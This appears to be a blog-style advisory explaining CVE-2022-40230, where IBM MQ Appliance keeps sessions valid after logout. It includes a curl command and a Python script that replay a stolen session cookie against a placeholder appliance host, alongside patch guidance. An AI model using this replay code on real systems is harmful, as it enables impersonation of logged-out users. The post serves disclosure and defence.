CVE-2022-40230 exposes a big vulnerability in several versions of the IBM MQ Appliance—versions 9.2 CD, 9.2 LTS, 9.3 CD, and 9.3 LTS. The problem? It fails to end (invalidate) user sessions after a user logs out. This means: someone who knows your session ID can impersonate you… even after you click logout.
This post explains what’s going on, how bad it can get, and how it can be exploited, with code, links, and simple language. If you’re running these IBM MQ Appliance versions, read on.
Summary of the Vulnerability
When you log out of most secure web apps, the server should “kill” your session. Your session ID should become worthless. In IBM MQ Appliance versions listed above, the server does not invalidate the session, so the session cookie stays valid even after logout.
Impact: An attacker can access your account without your knowledge
- IBM X-Force ID: 235532
- References
- IBM Security Bulletin
- NIST NVD: CVE-2022-40230
Explaining the Issue in Simple Terms
Imagine you log into your bank. As long as your “session cookie” is valid, you stay logged in. When you logout, your bank should destroy your cookie on *their* end, so you can’t use it again. If they don’t? Someone who stole your session ID before you logged out can keep using your account.
With CVE-2022-40230, IBM MQ Appliance forgets to destroy that session. If an attacker snatches your session ID, they can log you out (or wait for you to log yourself out)… and then just keep on using your session as if they were you.
Here’s a diagram of the failure
[You Log In]
|
[Attacker steals session ID]
|
[You Log Out] -------------------------------
| |
[Session remains valid!] <-- BIG PROBLEM
|
[Attacker logs in using your session ID]
9.3 LTS
Any appliance running these releases—before IBM’s patch—is at risk.
How Can Someone Exploit It?
An attacker only needs your session cookie. How could they get it?
Physical access or insider threat
Once the attacker has your session cookie, even if you logout, they can “fake” being you by presenting the cookie.
Suppose Alice’s cookie is
Set-Cookie: mqSessionId=ABCDE12345F; Path=/; Secure; HttpOnly
After Alice logs out, the attacker sends
curl -k -b "mqSessionId=ABCDE12345F" https://ibmmqappliance.example.com/management/your-info
Expected (secure): This should return an error.
Actual (vulnerable): This still gives access! The server doesn’t revoke the session.
Here’s a Python example using the requests library
import requests
# The session cookie stolen from the user
session_cookies = {'mqSessionId': 'ABCDE12345F'}
# Appliance management endpoint
url = 'https://ibmmqappliance.example.com/management/your-info'
response = requests.get(url, cookies=session_cookies, verify=False)
print(response.status_code)
print(response.text)
Even after Alice logs out, this code still works, showing her info.
How to Fix
IBM patched the issue.
Upgrade to the latest maintenance release.
See their bulletin:
IBM Official Bulletin for CVE-2022-40230
References
- IBM Security Bulletin CVE-2022-40230
- NIST NVD Entry for CVE-2022-40230
- IBM X-Force Vulnerability Report 235532
Conclusion
CVE-2022-40230 is real and dangerous. If you or your company uses IBM MQ Appliance, especially the versions listed, update right now. Otherwise, a session stealer—or even a careless insider—can impersonate users with zero effort, even after a normal logout.
Stay safe: patch fast, and check your session security everywhere.
If you find this guide helpful, let me know; I’ll write more simple, clear breakdowns for other CVEs!
Timeline
Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 17:14:00 UTC